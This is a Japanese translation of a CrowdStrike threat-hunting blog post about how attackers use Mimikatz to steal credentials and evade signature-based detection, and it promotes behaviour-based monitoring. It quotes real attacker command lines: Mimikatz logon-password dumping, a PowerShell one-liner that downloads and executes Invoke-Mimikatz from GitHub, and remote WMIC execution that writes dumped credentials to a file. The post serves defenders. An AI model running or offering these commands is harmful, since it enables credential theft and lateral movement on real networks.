CrowdStrike Blog：「サイバー界のAK47」、Mimikatzを利用したシグネチャベースの検知回避

　今回は、オープンソースツールのMimikatzが攻撃者にどのように利用されているかについて、CrowdStrike Falcon OverWatchチームが確認した例をいくつかご紹介します。中にはシグネチャベースの検知を回避するためにMimikatzが使われた珍しいケースもあります。

　OverWatchチームは、お客様のインフラストラクチャに対して試みられた攻撃を総合的に可視化しています。この可視化は多岐にわたるお客様の業種・規模を網羅しています。OverWatchチームは、Falconエンドポイントセキュリティプラットフォームが提供するシステムの可視化を用いて、悪意のあるアクティビティを広範囲に観測しています。

権限昇格に使用する認証情報へのアクセス

　悪意のあるアクティビティでよく見られるのが、認証情報へのアクセスです。多くの場合、攻撃者は権限を昇格してインフラストラクチャ内のアクセス可能な領域を広げるために、さまざまな手段を使って有効な認証情報を探します。OverWatchチームは、攻撃者が標的とした1人のユーザーに対して、認証情報を盗み取るために複数の手法を用いていたケースを確認しています（認証情報の窃取を狙った悪意のあるアクティビティで複数の手法が使用された例は、「2018年版 Falcon OverWatch Report」で紹介しています）。

Mimikatzの手法

　認証情報にアクセスする一般的な方法に、Mimikatzの使用が挙げられます。CrowdStrikeの共同創業者で最高技術責任者（CTO）のDmitri Alperovitchは、Mimikatzを「サイバー界のAK47」と呼んでいます。OverWatchチームは、標的型攻撃とペネトレーションテスト（侵入テスト）のいずれにおいてもMimikatzが使われていることを頻繁に観測しています。

実行ファイル名の変更

　Mimikatzを使用した最も単純で直接的な手法は、侵害したシステムにMimikatzをコピーし、実行ファイルの名前を変更し、以下のようなコマンドラインを使用して起動することです。

c:\ProgramData\p.exe ""privilege::debug""
""sekurlsa::logonpasswords""

　これにより攻撃者は、システム上の認証情報にアクセスできるようになります。

バッチファイルの使用

　Mimikatzを起動する別の方法でこれまでに確認されているものには、バッチファイルを使用して標的となるシステムにMimikatzをコピーし、それを起動してアウトプットをファイルに送信し、その出力ファイルを元の一元的な収集ポイントにコピーして、最後に標的となったシステムから関連ファイルをすべて削除する方法などがあります。

PowerShellの亜種を使用

　OverWatchのアナリストがこれまでに確認した認証情報にアクセスするためのその他の方法には、次のような、Mimikatz用に改変したPowerShellを使用した例があります。

powershell -ep Bypass -NoP -NonI -NoLogo -c IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent[.]com/[REDACTED]/Invoke-Mimikatz.ps1');Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswordsexit'

コマンドラインオプションの変更

　2018年第4四半期には、Mimikatzを使用した別の方法をOverWatchのアナリストが確認しています。具体的には、コマンドラインオプションを変更するように改変されたケースです。

mnl.exe pr::dg sl::lp et -p

　このMimikatzの特定の亜種は、以下に示すように、標的とした複数のシステムに対してWMIC.exeを使用して実行されます。

Wmic /NODE:"[REDACTED]" /USER:"[REDACTED]" /password:[REDACTED] process call create "cmd.exe /c (c:\windows\security\mnl.exe pr::dg sl::lp et -p >c:\windows\security\PList.txt) >>
c:\windows\temp\temp.txt"

IOAの監視が必須

　これらの手法は明らかに実行ファイルのコマンドラインオプションを参照してその目的を推測したり、バイナリファイル内に関連する文字列が存在するかどうかを確認することだけに頼る脆弱な検知アプローチを回避することを狙ったものと言えます。攻撃者はさまざまな手法を使って認証情報にアクセスする可能性がありますが、Falconプラットフォームは、検知メカニズムを回避または妨害する目的で新しい手法が使用されている場合にも確認できる可視水準を提供します。

　ファイル名、ハッシュ、単一のコマンドラインオプションなどの典型的な攻撃の痕跡（IOC）に注目するだけでなく、攻撃者の行動にフォーカスした攻撃の痕跡（IOA）を監視することの重要性が、さらに明らかになっています。

その他のリソース

・「2019 CrowdStrike Global Threat Report:Adversary Tradecraft and the Importance of Speed」をダウンロードしてご覧ください

・「2018年版 CrowdStrike Falcon OverWatch Report 脅威ハンティングの最前線」をダウンロードしてご覧ください

・CrowdStrikeの次世代アンチウイルス(AV)を実際にお試しいただけます。今すぐFalcon Preventの無料トライアル版をお試しください

＊原文はCrowdStrike Blog サイト掲載：https://www.crowdstrike.com/blog/credential-theft-mimikatz-techniques/